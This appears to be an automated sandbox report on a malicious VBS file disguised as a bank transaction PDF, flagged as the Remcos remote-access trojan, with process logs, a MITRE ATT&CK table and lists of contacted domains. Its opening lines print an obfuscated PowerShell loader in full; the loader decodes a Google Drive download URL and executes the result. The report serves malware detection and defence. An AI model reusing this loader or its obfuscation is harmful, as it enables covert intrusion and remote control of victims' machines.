Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$hjkommisrs='rakkerens';$troublesome=${host}.runspace;if ($troublesome) {$telephoning++;$hjkommisrs+='cacodorous';$achyrodes='su';$hjkommisrs+='coruscate';$achyrodes+='bs';$hjkommisrs+='tungusian';$achyrodes+='tri';$hjkommisrs+='sonatinen';$achyrodes+='ng';};function hammondorglets($stavnen){$vouchering=$stavnen.length-$telephoning;for( $svirrefluerne=5;$svirrefluerne -lt $vouchering;$svirrefluerne+=6){$ulceromembranous+=$stavnen.$achyrodes.'invoke'( $svirrefluerne, $telephoning);}$ulceromembranous;}function markedsadgang($diabolizing){ . ($udglatter174) ($diabolizing);}$footslogging=hammondorglets 'di,bomi,trookalorztausci ordtlhormelproseab,gge/feltr5 tim..tegne0 dm.n baggr(gutwiwtmre iiul,snschrod he toet.niwob.igscensu medbyn inoctrdvin derin1dorde0tuber.ersta0 ch,f;p.arm nondiwharstiunsiznspeed6thorv4tamil;m,gal deco,xgeebu6heide4misfo; subs purtrprofivcrypt:stork1 evan2 trep1tilba.fort 0bogde)piast bugtagv skoe skatc handkmartyoskavg/ zai 2.lvia0jazzh1hukom0ekspo0 b ni1hasar0 prie1cacoe oldnfbis.aiko sirskareefjolrf uds of,ugtxregio/ doub1cupre2 okku1calip.indbj0ve de ';$uncoveredly=hammondorglets 'danneu manusrygerepuff.r ,lag-.rigua sc pg t,umetaramnproditmos k ';$raasylte=hammondorglets 'psychhjomont g.smtimmovpchests medd:rub.i/antia/ obstd stjerslanki amylvf rmseabbed..amesgwis,aoporphodk,drgsukatl per eborge. brancfrekvop.nkum gimp/progru udvacke sk?petitec irpxa elspaudi,ofa,igr su gt gmnd=bochedgr peodelsaw fejlnadvanl xerooantema.nseddbevge& nonlitabordflubd= iorh1o chf2f.ndeyts.tswjustehembryd elytklserepforte2 stuea c,nf-and,rdirr,t0reinv-,lmmep beloymist y callqc,clo5fladtchvinty yatafve,ruhinf.uecirkuo c.gn3li,deeo,lfopdeut,s.olmuepr.je_ph.ll9k.ukaksankt ';$ceratitidae=hammondorglets 'b vog> stag ';$udglatter174=hammondorglets 'cedryichaloemididx rat, ';$unshrinkingly='ubiquities';$superfluity = hammondorglets 'kneeledor.oc d,odhland,o vat. opti%rigwia baadpdok,op.hronddrupea tetrtpennya forj% agna\hjt addi,kke,nsigpco raribrugacantovtnd.aeoverosami r.unc mtm,ndeemisk,r svin togvo& pseu&setba lnposeionizcforedhtus.aopol s macrtaksem ';markedsadgang (hammondorglets 'salts$ forlgbeslalcomidotwee.bafr,kaforurlmealy: in.assa,rou dorsbfiksatvix,nr a.vroivi.dpskumlival.ts mmorkwyteselamesskafka=snide(gldelc,ennemunderdndlgn ta,t/sa,myc bug. erys$udspisunrepuaphrapconc.e chamr hebrftressl bilyu indkih.mentblgety ndri)fundi ');markedsadgang (hammondorglets ' p.gt$ re rgbudgelu vikorenprb co,uamavedlm nil:.altecnyskal mdeaohloftc betokudforwobfusibru ssfemkaeatlan=ude.u$psaltrroastagenskasebi,skysery st,allitretgapcheko,em.reagestyponp.rotol udraifatt.t ewil(fyrst$f,ldec .ndee ngenrundera,mmettgymnaitero,tm,aneiwrongd shera oretebrtte)galop ');markedsadgang (hammondorglets 'tilbe[ schlnweigheac uitveget.mun.csst,leedeta.rc,llbvbaga,iim,osc fonde sacrpcosm,ointimikritinhorn tforesmvagt aincubnclinoa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$hjkommisrs='rakkerens';$troublesome=${host}.runspace;if ($troublesome) {$telephoning++;$hjkommisrs+='cacodorous';$achyrodes='su';$hjkommisrs+='coruscate';$achyrodes+='bs';$hjkommisrs+='tungusian';$achyrodes+='tri';$hjkommisrs+='sonatinen';$achyrodes+='ng';};function hammondorglets($stavnen){$vouchering=$stavnen.length-$telephoning;for( $svirrefluerne=5;$svirrefluerne -lt $vouchering;$svirrefluerne+=6){$ulceromembranous+=$stavnen.$achyrodes.'invoke'( $svirrefluerne, $telephoning);}$ulceromembranous;}function markedsadgang($diabolizing){ . ($udglatter174) ($diabolizing);}$footslogging=hammondorglets 'di,bomi,trookalorztausci ordtlhormelproseab,gge/feltr5 tim..tegne0 dm.n baggr(gutwiwtmre iiul,snschrod he toet.niwob.igscensu medbyn inoctrdvin derin1dorde0tuber.ersta0 ch,f;p.arm nondiwharstiunsiznspeed6thorv4tamil;m,gal deco,xgeebu6heide4misfo; subs purtrprofivcrypt:stork1 evan2 trep1tilba.fort 0bogde)piast bugtagv skoe skatc handkmartyoskavg/ zai 2.lvia0jazzh1hukom0ekspo0 b ni1hasar0 prie1cacoe oldnfbis.aiko sirskareefjolrf uds of,ugtxregio/ doub1cupre2 okku1calip.indbj0ve de ';$uncoveredly=hammondorglets 'danneu manusrygerepuff.r ,lag-.rigua sc pg t,umetaramnproditmos k ';$raasylte=hammondorglets 'psychhjomont g.smtimmovpchests medd:rub.i/antia/ obstd stjerslanki amylvf rmseabbed..amesgwis,aoporphodk,drgsukatl per eborge. brancfrekvop.nkum gimp/progru udvacke sk?petitec irpxa elspaudi,ofa,igr su gt gmnd=bochedgr peodelsaw fejlnadvanl xerooantema.nseddbevge& nonlitabordflubd= iorh1o chf2f.ndeyts.tswjustehembryd elytklserepforte2 stuea c,nf-and,rdirr,t0reinv-,lmmep beloymist y callqc,clo5fladtchvinty yatafve,ruhinf.uecirkuo c.gn3li,deeo,lfopdeut,s.olmuepr.je_ph.ll9k.ukaksankt ';$ceratitidae=hammondorglets 'b vog> stag ';$udglatter174=hammondorglets 'cedryichaloemididx rat, ';$unshrinkingly='ubiquities';$superfluity = hammondorglets 'kneeledor.oc d,odhland,o vat. opti%rigwia baadpdok,op.hronddrupea tetrtpennya forj% agna\hjt addi,kke,nsigpco raribrugacantovtnd.aeoverosami r.unc mtm,ndeemisk,r svin togvo& pseu&setba lnposeionizcforedhtus.aopol s macrtaksem ';markedsadgang (hammondorglets 'salts$ forlgbeslalcomidotwee.bafr,kaforurlmealy: in.assa,rou dorsbfiksatvix,nr a.vroivi.dpskumlival.ts mmorkwyteselamesskafka=snide(gldelc,ennemunderdndlgn ta,t/sa,myc bug. erys$udspisunrepuaphrapconc.e chamr hebrftressl bilyu indkih.mentblgety ndri)fundi ');markedsadgang (hammondorglets ' p.gt$ re rgbudgelu vikorenprb co,uamavedlm nil:.altecnyskal mdeaohloftc betokudforwobfusibru ssfemkaeatlan=ude.u$psaltrroastagenskasebi,skysery st,allitretgapcheko,em.reagestyponp.rotol udraifatt.t ewil(fyrst$f,ldec .ndee ngenrundera,mmettgymnaitero,tm,aneiwrongd shera oretebrtte)galop ');markedsadgang (hammondorglets 'tilbe[ schlnweigheac uitveget.mun.csst,leedeta.rc,llbvbaga,iim,osc fonde sacrpcosm,ointimikritinhorn tforesmvagt aincubnclinoa
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$hjkommisrs='rakkerens';$troublesome=${host}.runspace;if ($troublesome) {$telephoning++;$hjkommisrs+='cacodorous';$achyrodes='su';$hjkommisrs+='coruscate';$achyrodes+='bs';$hjkommisrs+='tungusian';$achyrodes+='tri';$hjkommisrs+='sonatinen';$achyrodes+='ng';};function hammondorglets($stavnen){$vouchering=$stavnen.length-$telephoning;for( $svirrefluerne=5;$svirrefluerne -lt $vouchering;$svirrefluerne+=6){$ulceromembranous+=$stavnen.$achyrodes.'invoke'( $svirrefluerne, $telephoning);}$ulceromembranous;}function markedsadgang($diabolizing){ . ($udglatter174) ($diabolizing);}$footslogging=hammondorglets 'di,bomi,trookalorztausci ordtlhormelproseab,gge/feltr5 tim..tegne0 dm.n baggr(gutwiwtmre iiul,snschrod he toet.niwob.igscensu medbyn inoctrdvin derin1dorde0tuber.ersta0 ch,f;p.arm nondiwharstiunsiznspeed6thorv4tamil;m,gal deco,xgeebu6heide4misfo; subs purtrprofivcrypt:stork1 evan2 trep1tilba.fort 0bogde)piast bugtagv skoe skatc handkmartyoskavg/ zai 2.lvia0jazzh1hukom0ekspo0 b ni1hasar0 prie1cacoe oldnfbis.aiko sirskareefjolrf uds of,ugtxregio/ doub1cupre2 okku1calip.indbj0ve de ';$uncoveredly=hammondorglets 'danneu manusrygerepuff.r ,lag-.rigua sc pg t,umetaramnproditmos k ';$raasylte=hammondorglets 'psychhjomont g.smtimmovpchests medd:rub.i/antia/ obstd stjerslanki amylvf rmseabbed..amesgwis,aoporphodk,drgsukatl per eborge. brancfrekvop.nkum gimp/progru udvacke sk?petitec irpxa elspaudi,ofa,igr su gt gmnd=bochedgr peodelsaw fejlnadvanl xerooantema.nseddbevge& nonlitabordflubd= iorh1o chf2f.ndeyts.tswjustehembryd elytklserepforte2 stuea c,nf-and,rdirr,t0reinv-,lmmep beloymist y callqc,clo5fladtchvinty yatafve,ruhinf.uecirkuo c.gn3li,deeo,lfopdeut,s.olmuepr.je_ph.ll9k.ukaksankt ';$ceratitidae=hammondorglets 'b vog> stag ';$udglatter174=hammondorglets 'cedryichaloemididx rat, ';$unshrinkingly='ubiquities';$superfluity = hammondorglets 'kneeledor.oc d,odhland,o vat. opti%rigwia baadpdok,op.hronddrupea tetrtpennya forj% agna\hjt addi,kke,nsigpco raribrugacantovtnd.aeoverosami r.unc mtm,ndeemisk,r svin togvo& pseu&setba lnposeionizcforedhtus.aopol s macrtaksem ';markedsadgang (hammondorglets 'salts$ forlgbeslalcomidotwee.bafr,kaforurlmealy: in.assa,rou dorsbfiksatvix,nr a.vroivi.dpskumlival.ts mmorkwyteselamesskafka=snide(gldelc,ennemunderdndlgn ta,t/sa,myc bug. erys$udspisunrepuaphrapconc.e chamr hebrftressl bilyu indkih.mentblgety ndri)fundi ');markedsadgang (hammondorglets ' p.gt$ re rgbudgelu vikorenprb co,uamavedlm nil:.altecnyskal mdeaohloftc betokudforwobfusibru ssfemkaeatlan=ude.u$psaltrroastagenskasebi,skysery st,allitretgapcheko,em.reagestyponp.rotol udraifatt.t ewil(fyrst$f,ldec .ndee ngenrundera,mmettgymnaitero,tm,aneiwrongd shera oretebrtte)galop ');markedsadgang (hammondorglets 'tilbe[ schlnweigheac uitveget.mun.csst,leedeta.rc,llbvbaga,iim,osc fonde sacrpcosm,ointimikritinhorn tforesmvagt aincubnclinoa	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$hjkommisrs='rakkerens';$troublesome=${host}.runspace;if ($troublesome) {$telephoning++;$hjkommisrs+='cacodorous';$achyrodes='su';$hjkommisrs+='coruscate';$achyrodes+='bs';$hjkommisrs+='tungusian';$achyrodes+='tri';$hjkommisrs+='sonatinen';$achyrodes+='ng';};function hammondorglets($stavnen){$vouchering=$stavnen.length-$telephoning;for( $svirrefluerne=5;$svirrefluerne -lt $vouchering;$svirrefluerne+=6){$ulceromembranous+=$stavnen.$achyrodes.'invoke'( $svirrefluerne, $telephoning);}$ulceromembranous;}function markedsadgang($diabolizing){ . ($udglatter174) ($diabolizing);}$footslogging=hammondorglets 'di,bomi,trookalorztausci ordtlhormelproseab,gge/feltr5 tim..tegne0 dm.n baggr(gutwiwtmre iiul,snschrod he toet.niwob.igscensu medbyn inoctrdvin derin1dorde0tuber.ersta0 ch,f;p.arm nondiwharstiunsiznspeed6thorv4tamil;m,gal deco,xgeebu6heide4misfo; subs purtrprofivcrypt:stork1 evan2 trep1tilba.fort 0bogde)piast bugtagv skoe skatc handkmartyoskavg/ zai 2.lvia0jazzh1hukom0ekspo0 b ni1hasar0 prie1cacoe oldnfbis.aiko sirskareefjolrf uds of,ugtxregio/ doub1cupre2 okku1calip.indbj0ve de ';$uncoveredly=hammondorglets 'danneu manusrygerepuff.r ,lag-.rigua sc pg t,umetaramnproditmos k ';$raasylte=hammondorglets 'psychhjomont g.smtimmovpchests medd:rub.i/antia/ obstd stjerslanki amylvf rmseabbed..amesgwis,aoporphodk,drgsukatl per eborge. brancfrekvop.nkum gimp/progru udvacke sk?petitec irpxa elspaudi,ofa,igr su gt gmnd=bochedgr peodelsaw fejlnadvanl xerooantema.nseddbevge& nonlitabordflubd= iorh1o chf2f.ndeyts.tswjustehembryd elytklserepforte2 stuea c,nf-and,rdirr,t0reinv-,lmmep beloymist y callqc,clo5fladtchvinty yatafve,ruhinf.uecirkuo c.gn3li,deeo,lfopdeut,s.olmuepr.je_ph.ll9k.ukaksankt ';$ceratitidae=hammondorglets 'b vog> stag ';$udglatter174=hammondorglets 'cedryichaloemididx rat, ';$unshrinkingly='ubiquities';$superfluity = hammondorglets 'kneeledor.oc d,odhland,o vat. opti%rigwia baadpdok,op.hronddrupea tetrtpennya forj% agna\hjt addi,kke,nsigpco raribrugacantovtnd.aeoverosami r.unc mtm,ndeemisk,r svin togvo& pseu&setba lnposeionizcforedhtus.aopol s macrtaksem ';markedsadgang (hammondorglets 'salts$ forlgbeslalcomidotwee.bafr,kaforurlmealy: in.assa,rou dorsbfiksatvix,nr a.vroivi.dpskumlival.ts mmorkwyteselamesskafka=snide(gldelc,ennemunderdndlgn ta,t/sa,myc bug. erys$udspisunrepuaphrapconc.e chamr hebrftressl bilyu indkih.mentblgety ndri)fundi ');markedsadgang (hammondorglets ' p.gt$ re rgbudgelu vikorenprb co,uamavedlm nil:.altecnyskal mdeaohloftc betokudforwobfusibru ssfemkaeatlan=ude.u$psaltrroastagenskasebi,skysery st,allitretgapcheko,em.reagestyponp.rotol udraifatt.t ewil(fyrst$f,ldec .ndee ngenrundera,mmettgymnaitero,tm,aneiwrongd shera oretebrtte)galop ');markedsadgang (hammondorglets 'tilbe[ schlnweigheac uitveget.mun.csst,leedeta.rc,llbvbaga,iim,osc fonde sacrpcosm,ointimikritinhorn tforesmvagt aincubnclinoa	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7396, type: MEMORYSTR

Remote Access Functionality

Detected Remcos RAT

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-U25QJ2

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 0000000F.00000002.1635549813.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wab.exe PID: 7396, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Windows Management Instrumentation	221 Scripting	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	111 Process Injection	2 Obfuscated Files or Information	LSASS Memory	113 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	21 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 Software Packing	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	111 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Rundll32	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pko_trans_details_20240909_105339#U00b7pdf.vbs	6%	Virustotal		Browse
pko_trans_details_20240909_105339#U00b7pdf.vbs	3%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://drive.usercontent.google.com	0%	Avira URL Cloud	safe
https://drive.googPR	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
https://go.micro	0%	Avira URL Cloud	safe
http://nuget.org/NuGet.exe	0%	Avira URL Cloud	safe
https://aka.ms/pscore6lB	0%	Avira URL Cloud	safe
http://crl.microsoft	0%	Avira URL Cloud	safe
http://crl.micro	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://drive.usercontent.google.com/c	0%	Avira URL Cloud	safe
https://contoso.com/	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	Avira URL Cloud	safe
https://drive.usercontent.google.com	0%	Avira URL Cloud	safe
https://drive.google.com	0%	Avira URL Cloud	safe
https://drive.usercontent.googh	0%	Avira URL Cloud	safe
https://drive.usercontent.google.com/	0%	Avira URL Cloud	safe
https://aka.ms/pscore68	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://apis.google.com	0%	Avira URL Cloud	safe
http://drive.google.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
drive.google.com	142.250.185.238	true	false	unknown
drive.usercontent.google.com	142.250.181.225	true	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	powershell.exe, 00000002.00000002.1728020389.000001BCCA2A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCC8921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA27D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA29F000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000F.00000003.1555754411.0000000006F6E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.googPR	powershell.exe, 00000002.00000002.1728020389.000001BCCA1BF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://drive.usercontent.google.com	powershell.exe, 00000002.00000002.1728020389.000001BCCA2B7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 0000000C.00000002.1618429477.0000000007210000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000000C.00000002.1615676256.00000000047A1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 0000000C.00000002.1618429477.0000000007272000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000C.00000002.1615676256.00000000048F9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 00000002.00000002.1728020389.000001BCC9780000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/c	wab.exe, 0000000F.00000002.1635549813.0000000006F4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1808446859.000001BCD84EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005946000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 0000000C.00000002.1616454793.0000000005809000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com	powershell.exe, 00000002.00000002.1728020389.000001BCC86A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1728020389.000001BCCA1BF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
